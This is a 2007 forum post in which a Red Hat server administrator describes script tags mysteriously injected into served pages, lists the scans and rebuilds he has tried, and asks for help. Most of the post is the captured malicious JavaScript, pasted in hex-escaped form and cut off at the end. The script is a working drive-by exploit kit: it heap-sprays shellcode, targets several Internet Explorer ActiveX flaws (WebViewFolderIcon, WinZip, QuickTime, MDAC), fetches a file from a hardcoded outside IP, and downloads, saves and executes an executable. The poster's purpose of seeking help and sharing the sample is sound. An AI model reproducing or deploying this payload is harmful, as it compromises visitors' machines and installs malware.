Old 08-04-2007, 05:39 AM   #1
kentsbest
LQ Newbie
 
Registered: Aug 2007
Posts: 3

Dynamic javascript injection - Malware


Hi All,

Architecture overview:

Redhat Enterprise Linux v3 Update 9 server running behind Foundry load balancer. The server has been updated with the latest patches from Redhat. Apache version is 2.0.46. We are also running Coldfusion MX 7 on the server and using PHP to serve dynamic content.

Problem description:

Earlier this week, our users started reporting that they were getting ActiveX prompts for Microsoft Data Access Component installation. In addition, some of them were getting hit by the RTSP bug (QuickTime) and some were getting the JS/Exploit-BO.gen alerts via McAfee. Upon troubleshooting, we see that irrespective of the page type (simple html, php, cfm, etc.) at times a script tag similar to the one below is inserted right after the <body> tag.

<script language='JavaScript' type='text/javascript' src='shfuy.js'></script>

The javascript file name changes and the problem only occurs at times. There is no set pattern to reproduce the problem although I have noticed that if I connect to the server via a new IP address from my DSL connection, I get the javascript in the source.

I ran some sniffer traces on the server and my laptop. This showed that the javascript was being sent by the server. I was able to capture the javascript (contents of the javascript below). If anybody wants to see the sniffer traces, please let me know and I can provide download links.

We also saw a post at Bloodhound virus - Web Hosting Forum - Web hosting discussion at SiteGround.com which shows a similar problem. Unfortunately the solution (use grsecurity kernel) does not make any sense and I suspect that it would be a temporary solution.

Solutions tried:
I have checked for the filenames but they do not exist on the server.

1) Have run chkrootkit and rootkit hunter - All clean
2) Have run clamav - All clean
3) Have run f-prot - All clean
4) Manually compiled Apache 2.0.59 + PHP 5.2.3 - Problem persists.

I would appreciate it if anybody could provide some input on what we might be dealing with and how to resolve the problem.

Javascript code:
var arg="akmukvfd";
var MU = "http://" + window.location.hostname + "/" + arg;
var MH = '';
for (i=0; i < MU.length; i++)
{
var b = MU.charCodeAt (i);
MH = MH + b.toString (16);
}
MH = MH.toUpperCase();
if (Math.round(MU.length/2) != (MU.length/2))
{
MH += '00';
}

var MR = '';
for (i=0; i < MH.length; i += 4)
{
MR = MR + '%u' + MH.substring(i+2, i+4) + MH.substring(i, i+2);
}

var MU2 = "\"" + MU + "\"";
var MR2 = "\"" + MR + "\"";

var SB =
unescape ('%0a%3c%68%74%6d%6c%3e%0a%3c%62%6f%64%79%3e%0a%3c %64%69%76%20%69%64%3d%22%6d%79%64%69%76%22%3e%3c%2 f%64%69%76%3e%0a%0a%3c%73%63%72%69%70%74%20%6c%61% 6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70 %74%22%3e%0a%0a%76%61%72%20%6d%65%6d%6f%72%79%20%3 d%20%6e%65%77%20%41%72%72%61%79%28%29%3b%0a%76%61% 72%20%6d%65%6d%5f%66%6c%61%67%20%3d%20%30%3b%0a%0a %66%75%6e%63%74%69%6f%6e%20%68%61%76%69%6e%67%28%2 9%20%7b%20%6d%65%6d%6f%72%79%3d%6d%65%6d%6f%72%79% 3b%20%73%65%74%54%69%6d%65%6f%75%74%28%22%68%61%76 %69%6e%67%28%29%22%2c%20%32%30%30%30%29%3b%20%7d%0 a%0a%66%75%6e%63%74%69%6f%6e%20%67%65%74%53%70%72% 61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69%64 %65%2c%20%73%70%72%61%79%53%6c%69%64%65%53%69%7a%6 5%29%0a%7b%0a%09%77%68%69%6c%65%20%28%73%70%72%61% 79%53%6c%69%64%65%2e%6c%65%6e%67%74%68%2a%32%3c%73 %70%72%61%79%53%6c%69%64%65%53%69%7a%65%29%0a%09%7 b%73%70%72%61%79%53%6c%69%64%65%20%2b%3d%20%73%70% 72%61%79%53%6c%69%64%65%3b%7d%0a%0a%09%73%70%72%61 %79%53%6c%69%64%65%20%3d%20%73%70%72%61%
79%53%6c%69%64%65%2e%73%75%62%73%74%72%69%6e%67%28 %30%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%65%2 f%32%29%3b%0a%09%72%65%74%75%72%6e%20%73%70%72%61% 79%53%6c%69%64%65%3b%0a%7d%0a%0a%66%75%6e%63%74%69 %6f%6e%20%6d%61%6b%65%53%6c%69%64%65%28%29%0a%7b%0 a%09%76%61%72%20%68%65%61%70%53%70%72%61%79%54%6f% 41%64%64%72%65%73%73%20%3d%20%30%78%30%63%30%63%30 %63%30%63%3b%0a%09%76%61%72%20%70%61%79%4c%6f%61%6 4%43%6f%64%65%20%3d%20%75%6e%65%73%63%61%70%65%28% 22%25%75%34%33%34%33%25%75%34%33%34%33%25%75%30%66 %65%62%25%75%33%33%35%62%25%75%36%36%63%39%25%75%3 8%30%62%39%25%75%38%30%30%31%25%75%65%66%33%33%22% 20%2b%0a%22%25%75%65%32%34%33%25%75%65%62%66%61%25 %75%65%38%30%35%25%75%66%66%65%63%25%75%66%66%66%6 6%25%75%38%62%37%66%25%75%64%66%34%65%25%75%65%66% 65%66%25%75%36%34%65%66%25%75%65%33%61%66%25%75%39 %66%36%34%25%75%34%32%66%33%25%75%39%66%36%34%25%7 5%36%65%65%37%25%75%65%66%30%33%25%75%65%66%65%62% 22%20%2b%0a%22%25%75%36%34%65%66%25%75%62%39%30%33 %25%75%36%31%38%37%25%75%65%31%61%31%25%
75%30%37%30%33%25%75%65%66%31%31%25%75%65%66%65%66 %25%75%61%61%36%36%25%75%62%39%65%62%25%75%37%37%3 8%37%25%75%36%35%31%31%25%75%30%37%65%31%25%75%65% 66%31%66%25%75%65%66%65%66%25%75%61%61%36%36%25%75 %62%39%65%37%22%20%2b%0a%22%25%75%63%61%38%37%25%7 5%31%30%35%66%25%75%30%37%32%64%25%75%65%66%30%64% 25%75%65%66%65%66%25%75%61%61%36%36%25%75%62%39%65 %33%25%75%30%30%38%37%25%75%30%66%32%31%25%75%30%3 7%38%66%25%75%65%66%33%62%25%75%65%66%65%66%25%75% 61%61%36%36%25%75%62%39%66%66%25%75%32%65%38%37%25 %75%30%61%39%36%22%20%2b%0a%22%25%75%30%37%35%37%2 5%75%65%66%32%39%25%75%65%66%65%66%25%75%61%61%36% 36%25%75%61%66%66%62%25%75%64%37%36%66%25%75%39%61 %32%63%25%75%36%36%31%35%25%75%66%37%61%61%25%75%6 5%38%30%36%25%75%65%66%65%65%25%75%62%31%65%66%25% 75%39%61%36%36%25%75%36%34%63%62%25%75%65%62%61%61 %25%75%65%65%38%35%22%20%2b%0a%22%25%75%36%34%62%3 6%25%75%66%37%62%61%25%75%30%37%62%39%25%75%65%66% 36%34%25%75%65%66%65%66%25%75%38%37%62%66%25%75%66 %35%64%39%25%75%39%66%63%30%25%75%37%38%
30%37%25%75%65%66%65%66%25%75%36%36%65%66%25%75%66 %33%61%61%25%75%32%61%36%34%25%75%32%66%36%63%25%7 5%36%36%62%66%25%75%63%66%61%61%22%20%2b%0a%22%25% 75%31%30%38%37%25%75%65%66%65%66%25%75%62%66%65%66 %25%75%61%61%36%34%25%75%38%35%66%62%25%75%62%36%6 5%64%25%75%62%61%36%34%25%75%30%37%66%37%25%75%65% 66%38%65%25%75%65%66%65%66%25%75%61%61%65%63%25%75 %32%38%63%66%25%75%62%33%65%66%25%75%63%31%39%31%2 5%75%32%38%38%61%25%75%65%62%61%66%22%20%2b%0a%22% 25%75%38%61%39%37%25%75%65%66%65%66%25%75%39%61%31 %30%25%75%36%34%63%66%25%75%65%33%61%61%25%75%65%6 5%38%35%25%75%36%34%62%36%25%75%66%37%62%61%25%75% 61%66%30%37%25%75%65%66%65%66%25%75%38%35%65%66%25 %75%62%37%65%38%25%75%61%61%65%63%25%75%64%63%63%6 2%25%75%62%63%33%34%25%75%31%30%62%63%22%20%2b%0a% 22%25%75%63%66%39%61%25%75%62%63%62%66%25%75%61%61 %36%34%25%75%38%35%66%33%25%75%62%36%65%61%25%75%6 2%61%36%34%25%75%30%37%66%37%25%75%65%66%63%63%25% 75%65%66%65%66%25%75%65%66%38%35%25%75%39%61%31%30 %25%75%36%34%63%66%25%75%65%37%61%61%25%
75%65%64%38%35%25%75%36%34%62%36%25%75%66%37%62%61 %22%20%2b%0a%22%25%75%66%66%30%37%25%75%65%66%65%6 6%25%75%38%35%65%66%25%75%36%34%31%30%25%75%66%66% 61%61%25%75%65%65%38%35%25%75%36%34%62%36%25%75%66 %37%62%61%25%75%65%66%30%37%25%75%65%66%65%66%25%7 5%61%65%65%66%25%75%62%64%62%34%25%75%30%65%65%63% 25%75%30%65%65%63%25%75%30%65%65%63%25%75%30%65%65 %63%22%20%2b%0a%22%25%75%30%33%36%63%25%75%62%35%6 5%62%25%75%36%34%62%63%25%75%30%64%33%35%25%75%62% 64%31%38%25%75%30%66%31%30%25%75%36%34%62%61%25%75 %36%34%30%33%25%75%65%37%39%32%25%75%62%32%36%34%2 5%75%62%39%65%33%25%75%39%63%36%34%25%75%36%34%64% 33%25%75%66%31%39%62%25%75%65%63%39%37%25%75%62%39 %31%63%22%20%2b%0a%22%25%75%39%39%36%34%25%75%65%6 3%63%66%25%75%64%63%31%63%25%75%61%36%32%36%25%75% 34%32%61%65%25%75%32%63%65%63%25%75%64%63%62%39%25 %75%65%30%31%39%25%75%66%66%35%31%25%75%31%64%64%3 5%25%75%65%37%39%62%25%75%32%31%32%65%25%75%65%63% 65%32%25%75%61%66%31%64%25%75%31%65%30%34%25%75%31 %31%64%34%22%20%2b%0a%22%25%75%39%61%62%
31%25%75%62%35%30%61%25%75%30%34%36%34%25%75%62%35 %36%34%25%75%65%63%63%62%25%75%38%39%33%32%25%75%6 5%33%36%34%25%75%36%34%61%34%25%75%66%33%62%35%25% 75%33%32%65%63%25%75%65%62%36%34%25%75%65%63%36%34 %25%75%62%31%32%61%25%75%32%64%62%32%25%75%65%66%6 5%37%25%75%31%62%30%37%22%20%2b%0a%22%25%75%31%30% 31%31%25%75%62%61%31%30%25%75%61%33%62%64%25%75%61 %30%61%32%25%75%65%66%61%31%22%20%2b%20') +
MR2 +
unescape ('%29%3b%0a%09%76%61%72%20%68%65%61%70%42%6c%6f%63 %6b%53%69%7a%65%20%3d%20%30%78%34%30%30%30%30%30%3 b%0a%09%76%61%72%20%70%61%79%4c%6f%61%64%53%69%7a% 65%20%3d%20%70%61%79%4c%6f%61%64%43%6f%64%65%2e%6c %65%6e%67%74%68%20%2a%20%32%3b%0a%09%76%61%72%20%7 3%70%72%61%79%53%6c%69%64%65%53%69%7a%65%20%3d%20% 68%65%61%70%42%6c%6f%63%6b%53%69%7a%65%20%2d%20%28 %70%61%79%4c%6f%61%64%53%69%7a%65%2b%30%78%33%38%2 9%3b%0a%09%76%61%72%20%73%70%72%61%79%53%6c%69%64% 65%20%3d%20%75%6e%65%73%63%61%70%65%28%22%25%75%30 %63%30%63%25%75%30%63%30%63%22%29%3b%0a%0a%09%73%7 0%72%61%79%53%6c%69%64%65%20%3d%20%67%65%74%53%70% 72%61%79%53%6c%69%64%65%28%73%70%72%61%79%53%6c%69 %64%65%2c%73%70%72%61%79%53%6c%69%64%65%53%69%7a%6 5%29%3b%0a%09%68%65%61%70%42%6c%6f%63%6b%73%20%3d% 20%28%68%65%61%70%53%70%72%61%79%54%6f%41%64%64%72 %65%73%73%20%2d%20%30%78%34%30%30%30%30%30%29%2f%6 8%65%61%70%42%6c%6f%63%6b%53%69%7a%65%3b%0a%09%0a% 09%66%6f%72%20%28%69%3d%30%3b%69%3c%68%65%61%70%42 %6c%6f%63%6b%73%3b%69%2b%2b%29%0a%09%7b%
0a%09%09%6d%65%6d%6f%72%79%5b%69%5d%20%3d%20%73%70 %72%61%79%53%6c%69%64%65%20%2b%20%70%61%79%4c%6f%6 1%64%43%6f%64%65%3b%0a%09%7d%0a%0a%09%6d%65%6d%5f% 66%6c%61%67%20%3d%20%31%3b%0a%09%68%61%76%69%6e%67 %28%29%3b%0a%09%72%65%74%75%72%6e%20%6d%65%6d%6f%7 2%79%3b%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73% 74%61%72%74%57%56%46%28%29%0a%7b%0a%09%66%6f%72%20 %28%69%3d%30%3b%69%3c%31%32%38%3b%69%2b%2b%29%0a%0 9%7b%0a%09%09%74%72%79%7b%20%0a%09%09%09%76%61%72% 20%74%61%72%20%3d%20%6e%65%77%20%41%63%74%69%76%65 %58%4f%62%6a%65%63%74%28%27%57%65%62%56%69%65%77%4 6%6f%6c%64%65%72%49%63%6f%6e%2e%57%65%62%56%69%65% 77%46%6f%6c%64%65%72%49%63%6f%6e%2e%31%27%29%3b%0a %09%09%09%74%61%72%2e%73%65%74%53%6c%69%63%65%28%3 0%78%37%66%66%66%66%66%66%65%2c%20%30%78%30%63%30% 63%30%63%30%63%2c%20%30%78%30%63%30%63%30%63%30%63 %2c%30%78%30%63%30%63%30%63%30%63%20%29%3b%20%0a%0 9%09%7d%63%61%74%63%68%28%65%29%7b%7d%0a%09%7d%0a% 7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%73%74%61%72%74 %57%69%6e%5a%69%70%28%6f%62%6a%65%63%74%
29%0a%7b%0a%09%76%61%72%20%78%68%20%3d%20%27%41%27 %3b%0a%09%77%68%69%6c%65%20%28%78%68%2e%6c%65%6e%6 7%74%68%20%3c%20%32%33%31%29%20%78%68%2b%3d%27%41% 27%3b%0a%09%78%68%2b%3d%22%5c%78%30%63%5c%78%30%63 %5c%78%30%63%5c%78%30%63%5c%78%30%63%5c%78%30%63%5 c%78%30%63%22%3b%0a%09%6f%62%6a%65%63%74%2e%43%72% 65%61%74%65%4e%65%77%46%6f%6c%64%65%72%46%72%6f%6d %4e%61%6d%65%28%78%68%29%3b%0a%7d%0a%0a%66%75%6e%6 3%74%69%6f%6e%20%73%74%61%72%74%4f%76%65%72%66%6c% 6f%77%28%6e%75%6d%29%0a%7b%0a%09%69%66%20%28%6e%75 %6d%20%3d%3d%20%30%29%20%7b%0a%09%09%74%72%79%20%7 b%0a%09%09%09%76%61%72%20%71%74%20%3d%20%6e%65%77% 20%41%63%74%69%76%65%58%4f%62%6a%65%63%74%28%27%51 %75%69%63%6b%54%69%6d%65%2e%51%75%69%63%6b%54%69%6 d%65%27%29%3b%09%09%0a%09%09%09%69%66%20%28%71%74% 29%20%7b%0a%09%09%09%09%76%61%72%20%71%74%68%74%6d %6c%20%3d%20%27%3c%6f%62%6a%65%63%74%20%43%4c%41%5 3%53%49%44%3d%22%63%6c%73%69%64%3a%30%32%42%46%32% 35%44%35%2d%38%43%31%37%2d%34%42%32%33%2d%42%43%38 %30%2d%44%33%34%38%38%41%42%44%44%43%36%
42%22%20%77%69%64%74%68%3d%22%31%22%20%68%65%69%67 %68%74%3d%22%31%22%20%73%74%79%6c%65%3d%22%62%6f%7 2%64%65%72%3a%30%70%78%22%3e%27%2b%0a%09%09%09%09% 27%3c%70%61%72%61%6d%20%6e%61%6d%65%3d%22%73%72%63 %22%20%76%61%6c%75%65%3d%22%68%74%74%70%3a%2f%2f%3 6%36%2e%39%36%2e%32%31%38%2e%38%35%2f%64%6f%77%6e% 6c%6f%61%64%2f%31%36%37%32%31%32%2f%6d%6f%76%69%65 %2e%71%74%6c%22%3e%27%2b%0a%09%09%09%09%27%3c%70%6 1%72%61%6d%20%6e%61%6d%65%3d%22%61%75%74%6f%70%6c% 61%79%22%20%76%61%6c%75%65%3d%22%74%72%75%65%22%3e %27%2b%0a%09%09%09%09%27%3c%70%61%72%61%6d%20%6e%6 1%6d%65%3d%22%6c%6f%6f%70%22%20%76%61%6c%75%65%3d% 22%66%61%6c%73%65%22%3e%27%2b%0a%09%09%09%09%27%3c %70%61%72%61%6d%20%6e%61%6d%65%3d%22%63%6f%6e%74%7 2%6f%6c%6c%65%72%22%20%76%61%6c%75%65%3d%22%74%72% 75%65%22%3e%27%2b%0a%09%09%09%09%27%3c%2f%6f%62%6a %65%63%74%3e%27%3b%0a%09%09%09%09%69%66%20%28%21%2 0%6d%65%6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c% 69%64%65%28%29%3b%0a%09%09%09%09%64%6f%63%75%6d%65 %6e%74%2e%67%65%74%45%6c%65%6d%65%6e%74%
42%79%49%64%28%27%6d%79%64%69%76%27%29%2e%69%6e%6e %65%72%48%54%4d%4c%20%3d%20%71%74%68%74%6d%6c%3b%0 a%09%09%09%09%6e%75%6d%20%3d%20%32%35%35%3b%0a%09% 09%09%7d%0a%09%09%7d%20%63%61%74%63%68%28%65%29%20 %7b%20%7d%0a%0a%09%09%69%66%20%28%6e%75%6d%20%3d%2 0%32%35%35%29%20%73%65%74%54%69%6d%65%6f%75%74%28% 22%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%31%29 %22%2c%20%32%30%30%30%29%3b%0a%09%09%65%6c%73%65%2 0%73%74%61%72%74%4f%76%65%72%66%6c%6f%77%28%31%29% 3b%0a%0a%09%7d%20%65%6c%73%65%20%69%66%20%28%6e%75 %6d%20%3d%3d%20%31%29%20%7b%0a%09%09%74%72%79%20%7 b%0a%09%09%09%76%61%72%20%77%69%6e%7a%69%70%20%3d% 20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65%45 %6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29%3 b%0a%09%09%09%77%69%6e%7a%69%70%2e%73%65%74%41%74% 74%72%69%62%75%74%65%28%22%63%6c%61%73%73%69%64%22 %2c%20%22%63%6c%73%69%64%3a%41%30%39%41%45%36%38%4 6%2d%42%31%34%44%2d%34%33%45%44%2d%42%37%31%33%2d% 42%41%34%31%33%46%30%33%34%39%30%34%22%29%3b%0a%0a %09%09%09%76%61%72%20%72%65%74%3d%77%69%
6e%7a%69%70%2e%43%72%65%61%74%65%4e%65%77%46%6f%6c %64%65%72%46%72%6f%6d%4e%61%6d%65%28%75%6e%65%73%6 3%61%70%65%28%22%25%30%30%22%29%29%3b%0a%09%09%09% 69%66%20%28%72%65%74%20%3d%3d%20%66%61%6c%73%65%29 %20%7b%0a%09%09%09%09%69%66%20%28%21%20%6d%65%6d%5 f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65%28% 29%3b%0a%09%09%09%09%73%74%61%72%74%57%69%6e%5a%69 %70%28%77%69%6e%7a%69%70%29%3b%0a%09%09%09%09%6e%7 5%6d%20%3d%20%32%35%35%3b%0a%09%09%09%7d%0a%0a%09% 09%7d%20%63%61%74%63%68%28%65%29%20%7b%20%7d%0a%0a %09%09%69%66%20%28%6e%75%6d%20%3d%20%32%35%35%29%2 0%73%65%74%54%69%6d%65%6f%75%74%28%22%73%74%61%72% 74%4f%76%65%72%66%6c%6f%77%28%32%29%22%2c%20%32%30 %30%30%29%3b%0a%09%09%65%6c%73%65%20%73%74%61%72%7 4%4f%76%65%72%66%6c%6f%77%28%32%29%3b%0a%0a%09%7d% 20%65%6c%73%65%20%69%66%20%28%6e%75%6d%20%3d%3d%20 %32%29%20%7b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%0 9%76%61%72%20%74%61%72%20%3d%20%6e%65%77%20%41%63% 74%69%76%65%58%4f%62%6a%65%63%74%28%27%57%65%62%56 %69%65%77%46%6f%6c%64%65%72%49%63%6f%6e%
2e%57%65%62%56%69%65%77%46%6f%6c%64%65%72%49%63%6f %6e%2e%31%27%29%3b%0a%09%09%09%69%66%20%28%74%61%7 2%29%20%7b%0a%09%09%09%09%69%66%20%28%21%20%6d%65% 6d%5f%66%6c%61%67%29%20%6d%61%6b%65%53%6c%69%64%65 %28%29%3b%0a%09%09%09%09%73%74%61%72%74%57%56%46%2 8%29%3b%0a%09%09%09%7d%0a%09%09%7d%20%63%61%74%63% 68%28%65%29%20%7b%20%7d%0a%09%7d%0a%7d%0a%0a%0a%66 %75%6e%63%74%69%6f%6e%20%47%65%74%52%61%6e%64%53%7 4%72%69%6e%67%28%6c%65%6e%29%0a%7b%0a%09%76%61%72% 20%63%68%61%72%73%20%3d%20%22%61%62%63%64%65%66%67 %68%69%6b%6c%6d%6e%6f%70%71%72%73%74%75%76%77%78%7 9%7a%22%3b%0a%09%76%61%72%20%73%74%72%69%6e%67%5f% 6c%65%6e%67%74%68%20%3d%20%6c%65%6e%3b%0a%09%76%61 %72%20%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20%3d%2 0%27%27%3b%0a%09%66%6f%72%20%28%76%61%72%20%69%3d% 30%3b%20%69%3c%73%74%72%69%6e%67%5f%6c%65%6e%67%74 %68%3b%20%69%2b%2b%29%20%7b%0a%09%09%76%61%72%20%7 2%6e%75%6d%20%3d%20%4d%61%74%68%2e%66%6c%6f%6f%72% 28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%20%2a%20 %63%68%61%72%73%2e%6c%65%6e%67%74%68%29%
3b%0a%09%09%72%61%6e%64%6f%6d%73%74%72%69%6e%67%20 %2b%3d%20%63%68%61%72%73%2e%73%75%62%73%74%72%69%6 e%67%28%72%6e%75%6d%2c%72%6e%75%6d%2b%31%29%3b%0a% 09%7d%0a%0a%09%72%65%74%75%72%6e%20%72%61%6e%64%6f %6d%73%74%72%69%6e%67%3b%0a%7d%0a%0a%66%75%6e%63%7 4%69%6f%6e%20%43%72%65%61%74%65%4f%62%6a%65%63%74% 28%43%4c%53%49%44%2c%20%6e%61%6d%65%29%20%7b%0a%09 %76%61%72%20%72%20%3d%20%6e%75%6c%6c%3b%0a%09%74%7 2%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43%4c% 53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%74%28 %6e%61%6d%65%29%27%29%20%7d%63%61%74%63%68%28%65%2 9%7b%7d%09%0a%09%69%66%20%28%21%20%72%29%20%7b%20% 74%72%79%20%7b%20%65%76%61%6c%28%27%72%20%3d%20%43 %4c%53%49%44%2e%43%72%65%61%74%65%4f%62%6a%65%63%7 4%28%6e%61%6d%65%2c%20%22%22%29%27%29%20%7d%63%61% 74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21 %20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c%2 8%27%72%20%3d%20%43%4c%53%49%44%2e%43%72%65%61%74% 65%4f%62%6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%2c %20%22%22%29%27%29%20%7d%63%61%74%63%68%
28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%21%20%72%29 %20%7b%20%74%72%79%20%7b%20%65%76%61%6c%28%27%72%2 0%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62%6a%65%63% 74%28%22%22%2c%20%6e%61%6d%65%29%27%29%20%7d%63%61 %74%63%68%28%65%29%7b%7d%20%7d%0a%09%69%66%20%28%2 1%20%72%29%20%7b%20%74%72%79%20%7b%20%65%76%61%6c% 28%27%72%20%3d%20%43%4c%53%49%44%2e%47%65%74%4f%62 %6a%65%63%74%28%6e%61%6d%65%2c%20%22%22%29%27%29%2 0%7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%69% 66%20%28%21%20%72%29%20%7b%20%74%72%79%20%7b%20%65 %76%61%6c%28%27%72%20%3d%20%43%4c%53%49%44%2e%47%6 5%74%4f%62%6a%65%63%74%28%6e%61%6d%65%29%27%29%20% 7d%63%61%74%63%68%28%65%29%7b%7d%20%7d%0a%09%72%65 %74%75%72%6e%28%72%29%3b%0a%7d%0a%0a%66%75%6e%63%7 4%69%6f%6e%20%58%4d%4c%48%74%74%70%44%6f%77%6e%6c% 6f%61%64%28%78%6d%6c%2c%20%75%72%6c%29%20%7b%0a%0a %09%74%72%79%20%7b%0a%09%09%78%6d%6c%2e%6f%70%65%6 e%28%22%47%45%54%22%2c%20%75%72%6c%2c%20%66%61%6c% 73%65%29%3b%0a%09%09%78%6d%6c%2e%73%65%6e%64%28%6e %75%6c%6c%29%3b%0a%0a%09%7d%20%63%61%74%
63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30%3b %20%7d%0a%0a%09%72%65%74%75%72%6e%20%78%6d%6c%2e%7 2%65%73%70%6f%6e%73%65%42%6f%64%79%3b%0a%7d%0a%0a% 66%75%6e%63%74%69%6f%6e%20%41%44%4f%42%44%53%74%72 %65%61%6d%53%61%76%65%28%6f%2c%20%6e%61%6d%65%2c%2 0%64%61%74%61%29%20%7b%0a%0a%09%74%72%79%20%7b%0a% 09%09%6f%2e%54%79%70%65%20%3d%20%31%3b%0a%09%09%6f %2e%4d%6f%64%65%20%3d%20%33%3b%0a%09%09%6f%2e%4f%7 0%65%6e%28%29%3b%0a%09%09%6f%2e%57%72%69%74%65%28% 64%61%74%61%29%3b%0a%09%09%6f%2e%53%61%76%65%54%6f %46%69%6c%65%28%6e%61%6d%65%2c%20%32%29%3b%0a%09%0 9%6f%2e%43%6c%6f%73%65%28%29%3b%0a%09%7d%20%63%61% 74%63%68%28%65%29%20%7b%20%72%65%74%75%72%6e%20%30 %3b%20%7d%0a%0a%09%72%65%74%75%72%6e%20%31%3b%0a%7 d%0a%0a%66%75%6e%63%74%69%6f%6e%20%53%68%65%6c%6c% 45%78%65%63%75%74%65%28%65%78%65%63%2c%20%6e%61%6d %65%2c%20%74%79%70%65%29%20%7b%0a%0a%09%69%66%20%2 8%74%79%70%65%20%3d%3d%20%30%29%20%7b%0a%09%09%74% 72%79%20%7b%20%65%78%65%63%2e%52%75%6e%28%6e%61%6d %65%2c%20%30%29%3b%20%72%65%74%75%72%6e%
20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%20 %7d%0a%09%7d%20%65%6c%73%65%20%7b%0a%09%09%74%72%7 9%20%7b%20%65%78%65%2e%53%68%65%6c%6c%45%78%65%63% 75%74%65%28%6e%61%6d%65%29%3b%20%72%65%74%75%72%6e %20%31%3b%20%7d%20%63%61%74%63%68%28%65%29%20%7b%2 0%7d%0a%09%7d%0a%0a%09%72%65%74%75%72%6e%28%30%29% 3b%0a%0a%7d%0a%0a%66%75%6e%63%74%69%6f%6e%20%4d%44 %41%43%28%29%20%7b%0a%09%76%61%72%20%74%20%3d%20%6 e%65%77%20%41%72%72%61%79%28%27%7b%42%44%39%36%43% 35%35%36%2d%36%35%41%33%2d%31%31%44%30%2d%39%38%33 %41%2d%30%30%43%30%34%46%43%32%39%45%33%30%7d%27%2 c%20%27%7b%42%44%39%36%43%35%35%36%2d%36%35%41%33% 2d%31%31%44%30%2d%39%38%33%41%2d%30%30%43%30%34%46 %43%32%39%45%33%36%7d%27%2c%20%27%7b%41%42%39%42%4 3%45%44%44%2d%45%43%37%45%2d%34%37%45%31%2d%39%33% 32%32%2d%44%34%41%32%31%30%36%31%37%31%31%36%7d%27 %2c%20%27%7b%30%30%30%36%46%30%33%33%2d%30%30%30%3 0%2d%30%30%30%30%2d%43%30%30%30%2d%30%30%30%30%30% 30%30%30%30%30%34%36%7d%27%2c%20%27%7b%30%30%30%36 %46%30%33%41%2d%30%30%30%30%2d%30%30%30%
30%2d%43%30%30%30%2d%30%30%30%30%30%30%30%30%30%30 %34%36%7d%27%2c%20%27%7b%36%65%33%32%30%37%30%61%2 d%37%36%36%64%2d%34%65%65%36%2d%38%37%39%63%2d%64% 63%31%66%61%39%31%64%32%66%63%33%7d%27%2c%20%27%7b %36%34%31%34%35%31%32%42%2d%42%39%37%38%2d%34%35%3 1%44%2d%41%30%44%38%2d%46%43%46%44%46%33%33%45%38% 33%33%43%7d%27%2c%20%27%7b%37%46%35%42%37%46%36%33 %2d%46%30%36%46%2d%34%33%33%31%2d%38%41%32%36%2d%3 3%33%39%45%30%33%43%30%41%45%33%44%7d%27%2c%20%27% 7b%30%36%37%32%33%45%30%39%2d%46%34%43%32%2d%34%33 %63%38%2d%38%33%35%38%2d%30%39%46%43%44%31%44%42%3 0%37%36%36%7d%27%2c%20%27%7b%36%33%39%46%37%32%35% 46%2d%31%42%32%44%2d%34%38%33%31%2d%41%39%46%44%2d %38%37%34%38%34%37%36%38%32%30%31%30%7d%27%2c%20%2 7%7b%42%41%30%31%38%35%39%39%2d%31%44%42%33%2d%34% 34%66%39%2d%38%33%42%34%2d%34%36%31%34%35%34%43%38 %34%42%46%38%7d%27%2c%20%27%7b%44%30%43%30%37%44%3 5%36%2d%37%43%36%39%2d%34%33%46%31%2d%42%34%41%30% 2d%32%35%46%35%41%31%31%46%41%42%31%39%7d%27%2c%20 %27%7b%45%38%43%43%43%44%44%46%2d%43%41%
32%38%2d%34%39%36%62%2d%42%30%35%30%2d%36%43%30%37 %43%39%36%32%34%37%36%42%7d%27%2c%20%6e%75%6c%6c%2 9%3b%0a%09%76%61%72%20%76%20%3d%20%6e%65%77%20%41% 72%72%61%79%28%6e%75%6c%6c%2c%20%6e%75%6c%6c%2c%20 %6e%75%6c%6c%29%3b%0a%09%76%61%72%20%69%20%3d%20%3 0%3b%0a%09%76%61%72%20%6e%20%3d%20%30%3b%0a%09%76% 61%72%20%72%65%74%20%3d%20%30%3b%0a%09%76%61%72%20 %75%72%6c%52%65%61%6c%45%78%65%20%3d%20') +
MU2 +
unescape ('%3b%0a%0a%09%77%68%69%6c%65%20%28%74%5b%69%5d%20 %26%26%20%28%21%20%76%5b%30%5d%20%7c%7c%20%21%20%7 6%5b%31%5d%20%7c%7c%20%21%20%76%5b%32%5d%29%20%29% 20%7b%0a%09%09%76%61%72%20%61%20%3d%20%6e%75%6c%6c %3b%0a%0a%09%09%74%72%79%20%7b%0a%09%09%09%61%20%3 d%20%64%6f%63%75%6d%65%6e%74%2e%63%72%65%61%74%65% 45%6c%65%6d%65%6e%74%28%22%6f%62%6a%65%63%74%22%29 %3b%0a%09%09%09%61%2e%73%65%74%41%74%74%72%69%62%7 5%74%65%28%22%63%6c%61%73%73%69%64%22%2c%20%22%63% 6c%73%69%64%3a%22%20%2b%20%74%5b%69%5d%2e%73%75%62 %73%74%72%69%6e%67%28%31%2c%20%74%5b%69%5d%2e%6c%6 5%6e%67%74%68%20%2d%20%31%29%29%3b%0a%09%09%7d%20% 63%61%74%63%68%28%65%29%20%7b%20%61%20%3d%20%6e%75 